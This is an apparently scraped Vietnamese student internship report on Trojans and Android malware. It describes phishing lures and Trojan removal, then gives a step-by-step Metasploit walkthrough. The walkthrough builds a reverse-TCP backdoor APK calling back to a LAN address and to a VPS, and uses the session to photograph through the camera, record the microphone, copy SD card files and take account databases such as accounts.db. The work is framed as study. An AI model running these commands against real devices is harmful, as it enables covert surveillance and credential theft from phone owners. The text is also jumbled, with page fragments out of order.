bao vô tình mở file nà y, lậ p tứ c Trojan đượ c kích độ ng và tự độ ng sao chép lạ i
tấ t cả cá c thô ng số về mậ t khẩ u củ a chủ thuê bao. Khô ng chỉ là mậ t khẩ u truy
cậ p Intemet mà ngay cả đến mậ t khẩ u củ a hò m thư điện tử cũ ng dễ dà ng bị
đá nh cắ p. Ngay sau khi chủ thuê bao kết nố i Internet, Trojan sẽ bí mậ t sinh ra
mộ t e- mail và gử i mậ t khẩ u đá nh cắ p về cho "tin tặ c". Và sau đó mỗ i lầ n thay
đổ i mậ t khẩ u virus Trojan sẽ tiếp tụ c lặ ng lẽ "tuồ n" củ a ă n cắ p tớ i mộ t địa chỉ
mà hacker nộ i đã định sẵ n.
Ðể đá nh lừ a "nạ n nhâ n", "tin tặ c" luô n tìm cá ch giă ng ra nhữ ng loạ i bẫ y
hết sứ c tinh vi. Tinh vi đến nỗ i khô ng ít chủ thuê bao dù rấ t 'kỹ tính" nhưng vẫ n
cứ "sậ p" bẫ y như thườ ng. Phổ biến nhấ t là hacker nộ i độ i lố t nhữ ng tổ chứ c
hay cô ng ty có uy tín để đá nh lừ a chủ thuê bao bằ ng chương trình phầ n mềm
Trang 32
thư ma Ghostmail. "tin tặ c" dễ dà ng thả o ra nhữ ng e-mail mạ o danh vớ i nộ i

dung: "Hiện giờ tình trạ ng đá nh cắ p mậ t khẩ u thuê bao đang rấ t phổ biến,
nhằ m để phò ng trá nh, chú ng tô i xin đượ c gử i tớ i quý khá ch chương trình phầ n
mềm Tr-Protect (Vi rú t Trojan sau khi đã đổ i tên)". Có khi chú ng lạ i "độ i lố t"
chuyên gia lậ p trình chương trình diệt virus số 1 Việt Nam Nguyễn Tử Quả ng:
"Ðể phò ng chố ng virus Chernobyl 26- 4, chú ng tô i hâ n hạ nh gở i tớ i quý ngà i
chương trình BKAV 383. Mong quý vị dù ng thử Mọ i ý kiến đó ng gó p xin gử i về
địa chỉ sau quangnt@it-hut.edu.vn". Khi nhậ n đượ c nhữ ng tin kiểu như vậ y, có
khô ng ít thuê bao dễ dà ng "cắ n câ u" và cứ "tự nhiên" cho chạ y chương trình vi
rú t Trojan mà khô ng hề nhậ n thứ c đượ c rằng họ đang "tự nguyện" hiến mình
thà nh nạ n nhâ n củ a bọ n "tin tặ c".
Như vậ y, khi Trojan đượ c kích hoạ t trên má y củ a bạ n và khi bạ n truy cậ p

Internet thì Trojan có thể lấ y mậ t khẩ u truy cậ p mạ ng, lấ y danh sá ch thư điện
tử và thậ m chí cả cấ u hình má y tính củ a bạ n để gử i cho mộ t địa chỉ thư điện tử
củ a tên tin tặ c. Nhưng nguy hiểm hơn, Trojan cò n gử i cả địa chỉ mạ ng IP, là địa
chỉ mà nhà cung cấ p dịch vụ mạ ng (ISP) gá n cho bạ n lú c truy cậ p; tên tin tặ c sẽ
sử dụ ng địa chỉ IP củ a bạ n để thiết lậ p kết nố i từ má y tính củ a hắ n tớ i má y tính
củ a bạ n qua mạ ng Internet. Trojan sẽ lấ y thô ng tin, xó a thô ng tin...
Các thủ đoạn của Hacker
1. Giả danh nhà cung cấ p dịch vụ : Hacker lấ y danh nghĩa nhà cung cấ p
dịch vụ Internet (ISP) gọ i điện thoạ i hoặ c gở i e-mail yêu cầ u bạ n cung cấ p
password hoặ c đổ i password theo họ gợ i ý. Hacker mail cho bạ n mộ t Attached
File (tậ p tin .exe) cho biết là file hỗ trợ sử dụ ng Internet nhưng thự c chấ t đâ y là
file ă n cắ p password.
2. Lợ i dụ ng sự tin tưở ng khi mượ n hoặ c sử a chữ a má y tính củ a bạ n họ sẽ

dễ dà ng lấ y mậ t khẩ u vì đa số ngườ i sử dụ ng đều thườ ng xuyên Save Password
và o má y.
3. Cà i "giá n điệp" và o má y tính củ a bạ n: Ðâ y là phương thứ c cổ điển

nhưng lạ i là cá ch ă n cắ p password thô ng dụ ng và hiệu quả nhấ t mà khô ng tố n
cô ng sứ c, thườ ng là file Horse Trojan đượ c gở i qua e-mail vớ i nhữ ng lờ i mờ i
chà o hết sứ c hấ p dẫ n, kích thích tò mò . Nếu bạ n mở file nà y thì ngay lậ p tứ c
má y bạ n đã bị nhiễm virus và từ đó trở đi, password củ a bạ n đượ c thườ ng
xuyên gở i về cho Hacker ngay cả khi bạ n thay password mớ i.
Trang 33
Ðề phòng, tìm và diệt Trojan?
Ðể đề phò ng bị nhiễm Trojan và cá c loạ i virus, bạ n cầ n thậ n trọ ng khi tả i

cá c tậ p tin trên mạ ng.
Ðể tìm và diệt Trojan, bạ n cầ n tiến hà nh theo cá c bướ c sau:
1. Khô ng nên tả i và chạ y thử nhữ ng tậ p tin gắ n kèm thư điện tử gử i cho
bạ n từ nhữ ng địa chỉ thư điện tử mà bạ n khô ng rõ . Cũ ng vì lý do nà y
mà tá c giả củ a chương trình diệt vi rú t thô ng dụ ng BKAV đã cả nh bá o
có nhiều kẻ mạ o danh gử i cho bạ n chương trình diệt virus mà thự c
chấ t là Trojan.
2. Sử dụ ng chương trình phá t hiện và diệt Trojan, bạ n có thể tìm kiếm
trên mạ ng Internet vớ i từ khó a "Detect and destroy Trojan".
3. Nếu bạ n khô ng có sẵn trong tay nhữ ng chương trình phá t hiện và diệt
Trojan thì bạ n có thể kiểm tra Registry củ a Window: HKEY – LOCAL –
MACHINE \ Software \ Microsoft \ Windows \ Current Version \ Run.
Nếu thấ y có đườ ng dẫ n tớ i mộ t chương trình mà bạ n biết là khô ng
phả i củ a Window hoặ c củ a cá c chương trình tiện ích, bạ n hã y thoá t
Window về chế độ DOS và xó a tậ p tin theo đườ ng dẫ n củ a Registry, và o
lạ i Window và xó a dò ng đã ghi trong Registry. Bạ n cũ ng có thể kiểm
tra cả tậ p tin Win.ini, System.ini trong thư mụ c C:\Windows sau mụ c
Run hoặ c Load.
2.1.5 Giới thiệu về Malware:
Trang 34
Malware (phầ n mềm á c tính) viết tắ t củ a cụ m từ Malicious Sofware, là mộ t

phầ n mềm má y tính đượ c thiết kế vớ i mụ c đích thâ m nhậ p hoặ c gâ y hỏ ng hó c
má y tính mà ngườ i sử dụ ng khô ng hề hay biết.
Theo thố ng kê củ a cá c hã ng bả o mậ t trên thế giớ i thì hiện cá c Malware

hiện nay mớ i chỉ dừ ng lạ i ở mứ c độ xâ m nhậ p và ă n cắ p thô ng tin củ a ngườ i
dù ng và nó chưa có cơ chế lâ y lan. Theo cá c kết quả trên thì Malware trên
Smartphone hiện nay về cá ch thứ c hoạ t độ ng giố ng như mộ t phầ n mềm giá n
điệp (Trojan) hơn là mộ t virus phá hủ y.
Cơ chế hoạt động của Malware
Malware này hoạ t độ ng qua hai giai đoạ n:
- Giai đoạ n đầ u: Malware đượ c nhú ng và o trong mộ t ứ ng dụ ng và sẽ chiếm

đượ c quyền root và o thiết bị củ a bạ n ngay sau khi bạ n chạ y ứ ng dụ ng đó trong
lầ n sử dụ ng đầ u tiên.
- Giai đoạ n 2: Malware tự độ ng cà i đặ t mộ t ứ ng dụ ng thứ 2 vớ i mộ t

permission đặ c biệt cho phép quyền uninstall. Mộ t khi cá c ứ ng dụ ng thứ 2
đượ c cà i đặ t, nó có thể gử i cá c thô ng tin nhạ y cả m tớ i mộ t má y chủ từ xa và â m
thầ m tả i thêm cá c ứ ng dụ ng khá c. Việc cà i đặ t ứ ng dụ ng hệ thố ng này nhằ m
ngă n ngừ a ngườ i dù ng xem hoặ c gỡ bỏ cà i đặ t cá c ứ ng dụ ng mà khô ng đượ c
phép.
Khô ng giố ng như giai đoạ n đầ u, ngườ i dù ng phả i khở i độ ng ứ ng dụ ng để

bắ t đầ u việc lâ y nhiễm. Ở giai đoạ n thứ hai ứ ng dụ ng tự độ ng là m mộ t số việc
như là confirm, check-in. Mộ t điều nữ a khiến cho bạ n khô ng thể biết chú ng
hoạ t độ ng lú c nà o (hầ u hết và o khoả ng thờ i gian từ 11h đêm tớ i 8h sá ng ngà y
hô m sau). Đâ y là khoả ng thờ i gian mà điện thoạ i ít có khả năng đượ c sử dụ ng
nhấ t. Điều nà y là m cho ngườ i dù ng khó khă n hơn trong việc phá t hiện mộ t
hà nh vi bấ t thườ ng trên chiếc smartphone củ a mình.
Mục đích của Malware
Mụ c đích củ a Malware mớ i chỉ dừ ng lạ i ở mứ c độ là m cho chiếc điện thoạ i

củ a ngườ i dù ng tự độ ng cà i đặ t nhữ ng ứ ng dụ ng chứ a mã độ c khá c. Tuy nhiên
cá c biến thể về sau đã kịp thờ i biến đổ i để gâ y ra cá c mố i nguy hạ i lớ n hơn rấ t
nhiều. Ví dụ như Hippo SMS đượ c tìm thấ y mớ i đâ y có khả nă ng tự gử i tin nhắ n
mà khô ng cầ n sự cho phép củ a ngườ i dù ng, việc nà y sẽ khiến tiền cướ c phí củ a
ngườ i dù ng tă ng lên mộ t cá ch chó ng mặ t mà ngườ i dù ng khô ng biết rõ lí do tạ i
sao. Hoặ c mộ t Malware khá c là Zitmo, Malware nà y đưa ra cá c ứ ng dụ ng kích
Trang 35
hoạ t mọ i hành độ ng liên quan đến dịch vụ ngâ n hà ng, tiếp nhậ n SMS gử i đến và
chuyển tớ i má y chủ . Cá c đoạ n code dù ng 1 lầ n mà cá c ngâ n hàng thườ ng gử i
tớ i khá ch hàng thô ng qua tin nhắn SMS để chứ ng thự c sẽ bị thu thậ p bở i cá c
malware này.
Hiện nay cò n có mộ t số Malware cò n có khả nă ng nghe lén tấ t cả cá c cuộ c

điện thoạ i. Vấ n đề này thự c sự nguy hiểm khi tấ t cả cá c vấ n đề riêng tư củ a
chú ng ta đang bị mộ t theo dõ i, vì vậ y nhữ ng mố i nguy hiểm từ mã độ c trên
Android đang thự c sự đe dọ a đến an sự an toà n củ a ngườ i dù ng hệ điều hà nh
này.
2.1.6 Sinh mã độc trên Kali Linux:
Ta sử dụ ng Metasploit framework trên Kali Linux để tạ o mộ t

payload, khi má y android tả i về và mở payload lên thì sẽ bị xâ m nhậ p và
điều khiển. Nếu sử dụ ng má y ả o Kali Linux bằ ng VMware, ta nên thiết lậ p
phầ n Network như sau:
Bấ m và o VM -> Settings... ở thanh lự a chọ n củ a VMware
Hình 2.1.24 Setting network VMware (Step 1)
Trang 36
Bấ m và o Network Adapter và chọ n Bridged: connection directly to the

physical network
Bấ m và o Edit -> Virtual Network Editor...
Trang 37
Trên phầ n Bridge (connect VMs directly to the external network)

chọ n adapter củ a má y thậ t
Sau đâ y ta và o phầ n chính tạ o backdoor và xâ m nhậ p điều khiển android
Đầ u tiên mở terminal và gõ dò ng lệnh
msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104

lport=8080 R > /root/Desktop/files.apk
Trang 38
192.168.0.104 là địa chỉ IP củ a má y Kali, ta có thể sử dụ ng lệnh ifconfig

để xem IP củ a má y Kali
8080 là số port, có thể chọ n port khá c, khô ng nên chọ n cá c port thườ ng
sử dụ ng
Lệnh trên sẽ tạ o ra 1 file files.apk trên desktop củ a Kali, đâ y chính là mộ t

Metasploit reverse tcp backdoor.
Trang 39
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạ o mộ t handler để xử lí dữ liệu truyền về

bằ ng cá ch gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Trang 40
set lhost 192.168.0.104 – [nhậ p địa chỉ IP giố ng vớ i khi tạ o payload ở

trên].
set lport 8080 – [nhậ p port giố ng vớ i port khi tạ o payload ở trên].
Exploit
Mà n hình sẽ như sau, lú c nà y ta đang chờ mộ t má y android mở backdoor.
2.1.7 Đưa mã độc vào thiết bị Android:
Vì khô ng có má y Android thậ t nên mình test thử vớ i mộ t má y Galaxy

Nexus giả lậ p bằ ng phầ n mềm GennyMotion (đă ng ký mộ t tà i khoả n và
donwload tạ i https://cloud.genymotion.com/page/launchpad/download/), tả i
về files.apk, cà i đặ t và mở lên đượ c giao diện như dướ i, nhấ p và o nú t
“ReverseTCP”:
Trang 41
Vậ y là ta đã kết nố i thà nh cô ng tớ i má y Android nà y, ở msfconsole sẽ

như sau:
Trang 42
 Sử dụng camera:
Để xem danh sá ch camera, nhậ p webcam_list
Để chụ p hình bằ ng camera, nhậ p webcam_snap x vớ i x là id củ a camera

xem ở danh sá ch camera ở phầ n trướ c. Ví dụ như sau:
Trang 43
File hình đã chụ p từ camera củ a má y android là FrumITki.jpeg đượ c lưu

ở /root củ a má y.
 Ghi âm
Để thự c hiện ghi â m, nhậ p lệnh record_mic và file ghi â m sẽ đượ c lưu về
má y
Trang 44
2.1.8 Xâm nhập SD card của thiết bị Android từ Kali Linux:
Để và o sdcard, nhậ p lệnh: cd /sdcard và lệnh ls để xem danh sá ch file,

thư mụ c
Ví dụ ở đâ y, ta tả i file App.apk trong thư mụ c download củ a sdcard
Trang 45
Dù ng lệnh cd /sdcard/Download để và o thư mụ c
Trang 46
Như trên hình, ta thấ y 1 file là App.apk, để tả i về má y, ta nhậ p lệnh
Download App.apk
Và file nà y sẽ đượ c tả i về thư mụ c /root củ a má y Kali
2.1.9 Kết luận:
Như vậ y, ta đã tìm hiểu về Kali Linux, cá ch sử dụ ng Metasploit củ a Kali

Linux để xâ m nhậ p và điều khiển, truyền dữ liệu từ má y android về má y.
Sau khi thử nghiệm cá ch tấ n cô ng nà y, ta rú t ra kết luậ n: khô ng nên tả i về

và chạ y file lạ trên má y android để bả o đả m khô ng cà i nhầ m backdoor như đã
thấ y ở trên, chỉ cầ n má y bị nhiễm backdoor là ta đã có thể xem như có toà n
quyền kiểm soá t má y android đó .
2.2 Làm trên VPS

2.2.1 Giới thiệu về VPS:
Định nghĩa
Má y chủ ả o (Virtual Private Server -VPS) là phương phá p phâ n chia mộ t

má y chủ vậ t lý thà nh nhiều má y chủ ả o. Trong khi trên mộ t server chạ y mộ t
Trang 47
Share Host thì có thể có hà ng tră m tà i khoả n chạ y cù ng lú c, nhưng trên server
chạ y VPS thì con số này chỉ bằ ng 1/10. Do vậ y, VPS có hiệu năng cao hơn Share
Host rấ t nhiều.
Mỗ i má y chủ là mộ t hệ thố ng hoà n toà n riêng biệt, có hệ điều hà nh riêng,

có toà n quyền quả n lý root và có thể restart lạ i hệ thố ng bấ t cứ lú c nà o. Do vậ y,
VPS hạ n chế 100% khả nă ng bị hack local.
Trên 1 server chạ y Share Host có nhiều Website chạ y chung vớ i nhau,
chung tà i nguyên server, nếu 1 Website bị tấ n cô ng Ddos, botnet quá mạ nh sẽ
là m ả nh hưở ng đến cá c Website khá c cù ng server, riêng server VPS, mộ t tà i
khoả n trên VPS bị tấ n cô ng thì mọ i tà i khoả n khá c trên VPS đều hoạ t độ ng bình
thườ ng.
VPS dà nh cho cá c doanh nghiệp vừ a và nhữ ng trang Web lớ n hoặ c mã

nguồ n nặ ng, nếu chạ y trên Share Host sẽ khô ng đá p ứ ng đủ yêu cầ u.Tuy nhiên,
VPS đò i hỏ i ngườ i sử dụ ng phả i có thêm mộ t số kiến thứ c về bả o mậ t, cấ u hình
server,….
Đặc điểm về thông số VPS
Hoạ t độ ng hoà n toà n như mộ t server riêng nên sở hữ u mộ t phầ n CPU

riêng, dung lượ ng RAM riêng, dung lượ ng ổ HDD riêng, địa chỉ IP riêng và hệ
điều hà nh riêng.
Tiết kiệm đượ c nhiều chi phí so vớ i việc thuê mộ t server riêng.
Ngoà i việc dù ng VPS để thiết lậ p Web Server, Mail Server cũ ng như cá c

ứ ng dụ ng khá c thì có thể cà i đặ t để thự c hiện nhữ ng yêu cầ u riêng như truy cậ p
Web bằ ng trình duyệt Web trên VPS, dowload/upload bittorrent vớ i tố c độ
cao…
Trong trườ ng hợ p VPS bị thiếu tà i nguyên thì có thể dễ dà ng nâng cấ p tà i

nguyên mà khô ng cầ n phả i khở i độ ng lạ i hệ thố ng.
Có thể cà i lạ i hệ điều hành vớ i thờ i gian từ 5-10 phú t.
Giá trị khi sử dụng VPS
Server mạ nh vớ i nhiều cấ u hình cho phép khá ch hà ng dễ dà ng lự a chọ n

gó i VPS phù hợ p.
Miễn phí chi phí cà i đặ t ban đầ u cũ ng như cấ u hình hoạ t độ ng cho khá c
hà ng.
Trang 48
Hỗ trợ khá c hà ng cà i đặ t miễn phí thêm cá c phầ n mềm riêng.
Đượ c cấ u hình và cà i đặ t hệ thố ng Firewall và DDOS Protection.
Bộ phậ n kỹ thuậ t kịp thờ i can thiệp nhanh chó ng nếu có sự cố phá t sinh.
2.2.2 Cài đặt mã độc trên VPS:
Giới thiệu
Metasploit là mộ t cô ng cụ khai thá c lỗ hổ ng củ a cá c hệ điều hà nh, dù ng để
kiểm tra, tấ n cô ng và khai thá c lỗ i củ a cá c service. Metasploit đượ c xâ y dự ng từ
ngô n ngữ hướ ng đố i tượ ng Perl, vớ i nhữ ng components đượ c viết bằ ng C,
assembler, và Python. Metasploit có thể chạ y trên hầ u hết cá c hệ điều hà nh:
Linux, Windows, Mac OS.
Cài đặt
Tải gó i cài đặ t củ a Metasploit, ở đây ta có 2 phiên bản là Pro và

Community. Ta chọ n phiên bản Community miễn phí và dù ng cho nghiên cứ u.
Trang 49
Sau khi tả i về gó i cà i đặ t củ a Metasploit Community ta cà i đặ t như nhữ ng

phầ n mềm khá c.
Trang 50
Chọ n folder cà i đặ t:
Cổ ng củ a dịch vụ Metasploit sẽ sử dụ ng, mặ c định là 3790:
Trang 51
Chọ n server và ngà y hết hạ n, để mặ c định:
Quá trình cà i đặ t củ a Metasploit:
Trang 52
Tiến trình hoà n tấ t, chọ n Finish và truy cậ p đến giao diện web củ a chương
trình:
Sau khi Finish trình duyệt web mở lên và đi tớ i giao diện
Trang 53
Click và o link: https://localhost:3790/ sẽ dẫ n đến trang tạ o tà i khoả n để

login và o
Metasploit. Điền Username, Password sử dụ ng và mộ t số thô ng tin bổ xung, rồ i
chọ n Create Account:
Trình duyệt chuyển đến trang nhậ p key để active chương trình, key này
đượ c gử i miễn phí đến mail khi tả i phầ n mềm. Sau khi điền key nhấ n Activate
License:
Trang 54
Giao diện chương trình Metasploit Console
Trang 55
2.2.3 Từ VPS xâm nhập vào thiết bị Android:
Các bước thực hiện
1. Sử dụ ng Kali Linux để tạ o file APK làm backdoor để hack vào

Android như trên mang LAN vớ i địa chỉ IP là địa chỉ củ a VPS
Chú ng ta vẫn sử dụ ng lệnh
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132
lport=4444 R > /root/Desktop/files.apk
Ở đây địa chỉ VPS là 14.0.21.132
2. Khở i động Metasploit Console trên VPS
3. Chú ng ta thự c hiện các bướ c xâm nhập như đã đề cậ p ở phần trên, ở
đây chỉ khác là sử dụ ng chính IP củ a VPS
Trang 56
4. Sau khi má y nạ n nhâ n tả i về file apk đã đượ c tạ o ra, má y android

đó sẽ bị hack
Trang 57
5. Sử dụ ng lệnh Help để xem cá c lệnh đượ c metasploit hỗ trợ
Để xem thô ng tin về má y, nhậ p lệnh sysinfo

Để xem cá c tá c vụ đang chạ y gõ ps
Xem ip gõ ifconfig
Xem danh sá ch thư mụ c, file gõ ls
Sử dụng camera:
Để xem danh sá ch camera, nhậ p webcam_list
Để chụ p hình bằ ng camera, nhậ p webcam_snap x vớ i x là id củ a camera
xem ở danh sá ch camera ở phầ n trướ c.
Ghi âm
Để thự c hiện ghi â m, nhậ p lênh record_mic và file ghi â m sẽ đượ c lưu về
má y
Trang 58
Lấy file từ sd card

Để và o sdcard, nhậ p lệnh: cd /sdcard và lệnh ls để xem danh sá ch file, thư
mụ c
Dù ng lệnh cd /sdcard/Download để và o thư mụ c
Để tải về máy, ta nhập lệnh

Download App.apk
Để upload gõ lệnh upload

Và file nà y sẽ đượ c tả i về thư mụ c root củ a má y Kali
Gõ shell để và o lệnh
kiểm tra xem có root chưa gõ
su
whoami
Nếu bá o unknown id is 0 tứ c là đã root
ls -l danh mụ c file và cá c quyền
cd để chuyển hướ ng thư mụ c
Để ă n cắ p tà i khoả n, mậ t khẩ u, file apk và thay đổ i cá c quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
để xem danh sá ch và down load cá c file hay thay đổ i cá c file trong ROM
đầ u tiên phả i gõ lệnh SU để có toà n quyền truy cậ p
để có đườ ng dẫ n đầ y đủ dù ng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lạ i
Sử dụng SQLite để mở file db
Trang 59
3 KẾT QUẢ ĐẠT ĐƯỢC
Những kiến thức lý thuyết đã được củng cố:
 Tìm hiểu về lịch sử , quá trình phá t triển củ a hệ điều hà nh Android

 Tìm hiểu về hệ điều hà nh Kali Linux
 Tìm hiểu về cá c lỗ hổ ng bả o mậ t củ a Windows và Android
 Tìm hiểu về cá ch sử a đổ i file APK và thự c hiện Signing ứ ng dụ ng
Những kỹ năng thực hành đã được học thêm:
 Thự c hiện cà i đặ t Android trên má y ả o

 Cà i đặ t Kali Linux, sử dụ ng nó để hack và o cá c lỗ hổ ng bả o mậ t củ a
Windows và Android
 Thi lấ y chứ ng chỉ System Hacking củ a trung tâ m Athena
 Thự c hiện sử a đổ i, tạ o ra cá c file Trojan, Backdoor sau đó cà i đặ t
và o Android
 Biết thêm về mộ t số bà i họ c trong lớ p Hacker mũ trắ ng
Những kinh nghiệm thực tiễn đã tích lũy được:
Qua gầ n 2 thá ng thự c tậ p, bả n thâ n em đã đú c kết đượ c nhiều kinh

nghiệm quý bá u, thứ nhấ t đó là cá c kĩ năng về chuyên mô n, em đã đượ c họ c và
cũ ng cố cá c kiến thứ c mớ i bên cạ nh cá c kiến thứ c nền tả ng. Hơn đó nữ a là quá
trình thự c tậ p trong mô i trườ ng doanh nghiệp đã cho em là m quen dầ n để
khô ng bỡ ngỡ trong quá trình đi là m sau này, thô ng qua cá c kĩ nă ng giao tiếp
và ứ ng xử .
Trang 60
4 KẾT LUẬN QUÁ TRÌNH THỰC TẬP
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
..................................................................................................................................
Trang 61

Security Kali Linux

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Security Kali Linux

Uploaded by

Copyright:

Available Formats

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRUNG TÂM ĐÀO TẠO

Nghiên cứu các Trojan, Malware cho phép đánh

GVHD: Thầ y VÕ ĐỖ THẮ NG

TPHCM, ngà y 28 thá ng 07 nă m 2014

LỜI CAM ĐOAN

Tô i xin cam đoan:

TPHCM, ngà y 28 thá ng 07 nă m 2014

LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK

Tô i xin châ n thà nh cả m ơn trườ ng Đạ i Họ c Bá ch Khoa TPHCM và khoa

TPHCM, ngà y 28 thá ng 07 nă m 2014

LỜI CẢM ƠN TRUNG TÂM ATHENA

Tô i xin cả m ơn giá m đố c Cô ng Ty Quả n Trị và An Ninh Mạ ng Quố c Tế

TPHCM, ngà y 28 thá ng 07 nă m 2014

Trong nhữ ng nă m gầ n đâ y, vấ n đề “An toà n và bả o mậ t thô ng tin” đang

NHẬN XÉT CỦA KHOA

NHẬN XÉT CỦA CÔNG TY THỰC TẬP

NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN

LỜ I CẢ M ƠN KHOA KH & KT MÁ Y TÍNH, ĐH BK TPHCM..............................................2

NHẬ N XÉ T CỦ A CÔ NG TY THỰ C TẬ P....................................................................................6

NHẬ N XÉ T CỦ A GIÁ O VIÊ N HƯỚ NG DẪ N...........................................................................7

1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP..............................................9

2 NỘI DUNG THỰC TẬP...........................................................................................11

2.1 Là m trên localhost:........................................................................................................11

4 KẾT LUẬN QUÁ TRÌNH THỰC TẬP................................................................61

1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP

Cơ sở 1_Tại TP Hồ Chí Minh:

Cơ sở 2_Tại TP Hồ Chí Minh:

Website: www.athena.edu.vn or www.athena.com.vn

Điện thoạ i: (84-8) 2210 3801

cơ quan chính phủ , tổ chứ c tà i chính…

- Độ i ngũ giả ng viên:

2 NỘI DUNG THỰC TẬP

Kali Linux là mộ t hệ điều hà nh đượ c xâ y dự ng trên nhâ n Linux, đượ c thiết

Nó i về ưu điểm củ a Kali là nó i về nhữ ng thay đổ i giữ a BackTrack và Kali.

Kali phát triển trên nền tảng hệ điều hành Debian

có thể dễ dà ng có đượ c cá c bả n cậ p nhậ t vá lỗ i bả o mậ t mớ i nhấ t và cá c cậ p

2.1.2 Cài đặt Kali Linux trên VMware:

Trướ c tiên cầ n tả i về file ISO phiên bả n mớ i nhấ t củ a Kali Linux trên

Hình 2.1.1 Download HĐH Kali Linux

Chọ n Typical và nhấ n Next. Đâ y là nhữ ng cà i đặ t mà VMware

Hình 2.1.2 New Virtual Machine Wizard (Step 1)

Tick và o Installer Disc image file. Và chọ n đến file ISO cầ n cà i đặ t

Hình 2.1.3 New Virtual Machine Wizard (Step 2)

Sau đó sẽ chọ n tên má y ả o và nơi lưu trữ dữ liệu củ a nó

Hình 2.1.4 New Virtual Machine Wizard (Step 3)

Ở nhữ ng bướ c sau thì cứ nhấn Next. Đến đâ y thì có mộ t tù y chọ n là

Hình 2.1.5 New Virtual Machine Wizard (Step 4)

Sau khi hoà n thà nh cá c bướ c này thì má y ả o sẽ tự độ ng bậ t và sẽ tiến

Bạ n sẽ nhìn thấ y mà n hình khở i độ ng củ a Kali. Chọ n mộ t trong hai

Hình 2.1.6 Graphical Install

Chọ n ngô n ngữ , vị trí đấ t nướ c củ a bạ n sau đó click Continue

Hình 2.1.7 Select a language

Hình 2.1.8 Select your location

Bạ n cũ ng sẽ đượ c yêu cầ u để cấ u hình bà n phím vớ i bà n phím bạ n

Hình 2.1.9 Configure the keyboard

Bạ n sẽ cầ n phả i cấ u hình Network và Password cho tà i khoả n Root

Hình 2.1.10 Configure the network

Hình 2.1.11 Set up user and password

Tiếp đến bạ n sẽ lự a chọ n ổ đĩa bạ n sẽ cà i đặ t Kali.

Hình 2.1.12 Partition disks (Step 1)

Hình 2.1.13 Partition disks (Step 2)

Hình 2.1.14 Partition disks (Step 3)

Hình 2.1.15 Partition disks (Step 4)